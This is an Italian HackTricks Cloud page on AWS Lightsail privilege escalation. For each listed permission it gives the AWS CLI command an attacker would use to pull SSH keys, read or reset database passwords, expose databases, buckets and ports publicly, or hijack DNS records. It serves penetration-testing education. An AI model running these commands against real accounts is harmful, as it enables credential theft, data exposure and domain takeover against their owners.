AWS - Lightsail Privesc

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository github.

Lightsail

Per ulteriori informazioni su Lightsail controlla:

AWS - Lightsail Enum

È importante notare che Lightsail non utilizza i ruoli IAM appartenenti all'utente ma a un account gestito da AWS, quindi non puoi abusare di questo servizio per privesc. Tuttavia, dati sensibili come codice, chiavi API e informazioni sul database potrebbero essere trovati in questo servizio.

`lightsail:DownloadDefaultKeyPair`

Questo permesso ti permetterà di ottenere le chiavi SSH per accedere alle istanze:

aws lightsail download-default-key-pair

Impatto Potenziale: Trova informazioni sensibili all'interno delle istanze.

`lightsail:GetInstanceAccessDetails`

Questa autorizzazione ti permetterà di generare chiavi SSH per accedere alle istanze:

aws lightsail get-instance-access-details --instance-name <instance_name>

Impatto Potenziale: Trova informazioni sensibili all'interno delle istanze.

`lightsail:CreateBucketAccessKey`

Questo permesso ti permetterà di ottenere una chiave per accedere al bucket:

aws lightsail create-bucket-access-key --bucket-name <name>

Impatto Potenziale: Trova informazioni sensibili all'interno del bucket.

`lightsail:GetRelationalDatabaseMasterUserPassword`

Questo permesso ti permetterà di ottenere le credenziali per accedere al database:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Impatto Potenziale: Trova informazioni sensibili all'interno del database.

`lightsail:UpdateRelationalDatabase`

Questo permesso ti permetterà di cambiare la password per accedere al database:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Se il database non è pubblico, puoi anche renderlo pubblico con queste autorizzazioni con

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Impatto Potenziale: Trovare informazioni sensibili all'interno del database.

`lightsail:OpenInstancePublicPorts`

Questo permesso consente di aprire porte su Internet.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Impatto Potenziale: Accesso a porte sensibili.

`lightsail:PutInstancePublicPorts`

Questo permesso consente di aprire porte su Internet. Nota che la chiamata chiuderà qualsiasi porta aperta non specificata in essa.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Impatto Potenziale: Accesso a porte sensibili.

`lightsail:SetResourceAccessForBucket`

Questa autorizzazione consente di dare a un'istanza accesso a un bucket senza credenziali aggiuntive.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Impatto Potenziale: Potenziale nuovo accesso a bucket con informazioni sensibili.

`lightsail:UpdateBucket`

Con questo permesso un attaccante potrebbe concedere al proprio account AWS accesso in lettura sui bucket o addirittura rendere i bucket pubblici per tutti:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Impatto Potenziale: Potenziale nuovo accesso a bucket con informazioni sensibili.

`lightsail:UpdateContainerService`

Con questi permessi, un attaccante potrebbe concedere accesso a ECR privati dal servizio di container.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Impatto Potenziale: Ottenere informazioni sensibili da ECR privato

`lightsail:CreateDomainEntry`

Un attaccante con questo permesso potrebbe creare un sottodominio e puntarlo al proprio indirizzo IP (presa di sottodominio), o creare un record SPF che gli consente di falsificare email dal dominio, o addirittura impostare il dominio principale al proprio indirizzo IP.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Impatto Potenziale: Prendere il controllo di un dominio

`lightsail:UpdateDomainEntry`

Un attaccante con questo permesso potrebbe creare un sottodominio e puntarlo al proprio indirizzo IP (presa di controllo del sottodominio), o creare un record SPF che gli consenta di falsificare email dal dominio, o addirittura impostare il dominio principale al proprio indirizzo IP.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Impatto Potenziale: Prendere il controllo di un dominio

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.

PreviousAWS - Lambda Privesc NextAWS - Mediapackage Privesc

Last updated 3 days ago